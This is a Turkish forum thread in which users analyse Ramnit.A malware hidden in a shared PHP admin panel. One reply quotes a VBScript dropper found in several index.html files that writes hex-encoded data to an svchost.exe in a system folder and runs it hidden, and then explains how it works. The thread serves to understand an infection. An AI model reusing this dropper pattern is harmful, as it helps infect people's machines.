• Forum vBulletin altyapısından Xenforo altyapısına geçirildi, bu sebeple eski şifreleriniz ile foruma giriş yapamayacaksınız, parolamı unuttum adımından mailiniz ile şifre sıfırlayarak giriş yapabilirsiniz.

    Üyeliklerinde geçerli bir mail adresi olmadığı için sıfırlama yapamayacak kullanıcılar forum kullanıcı adlarını ve yeni şifrelerini yazarak info@maxigame.org adresine şifre sıfırlamak istediklerine dair bir mail göndersinler şifrelerini sıfırlayıp mail adreslerini güncelleyeceğiz. Şifreniz sıfırlandıktan sonra foruma giriş yapıp tekrar istediğiniz gibi değiştirebilirsiniz.

[PHP]Win32/Ramnit.A virüsü hakkında yardım.

msterou011flu

Aileden
msterou011flu
Aktiflik
K.Tarihi
21 May 2009
Mesajlar
391
Puanı
41
Konum
Antalya
[BILGI]Şu sıralar Ramnit.A sürekli karşıma çıkıp duruyor. Çabuk bulaşabilen, kendisini sistem başlangıcına alabilen, sistem dosyalarına bulaşabilen tehlikeli bir virüsmüş.[/BILGI]

Virüsleri .exe, .dll, vs vs. bu tip uzantılarda görüyoruz tamam da PHP içinde nasıl yerleştiriyorlar onu anlamıyorum. 1 tane Ramnit.A virüslü panel paylaşacağım mantığı ne, nasıl yürüyor işler onu anlamak istiyorum.

 
Php bilmiyorum ama "\test\admin\js\plugins\fullcalendar\index.html" dosyasında şu satırları buldum:

Kod: 
DropFileName = "svchost.exe"
WriteData = "zararlı dosyaya ait veriler"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

index.html sayfası görüntülenmek istediğinde "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" dizinine svchost.exe adında bir dosya oluşturup "WriteData" değişkenindeki hex kodlarını dosyaya yazıyor ve programı çalıştırıyor. Bundan başka virüslü 2 html dosyası daha var:

"\test\install\js\plugins\fullcalendar\index.html"
"\test\js\plugins\fullcalendar\index.html"

Virüs yine exe halinde ancak kodları bir ara dosya içine normal metin şeklinde yazılmış. ara dosya yani html dosyası görüntülendiğinde ilgili satırlar çalışıyor ve for-next döngüsü içinde metin binary koda dönüşürülüp dosyaya kaydediliyor
 
Son düzenleme:
Sadece çalışma mantığını öğrenmek istemiştim teşekkür ettim. Demek ki o paneli paylaşanlar kendi bildikleri yerlere virüs yaymak için index oluşturuyorlar. Sen paneli kurunca indexe gelip seni ele geçirebiliyorlar. :d vay uyanıklar.
 
Konuya cevap yazabilmek için giriş yapmanız veya üye olmanız gerekmektedir.
Geri
Üst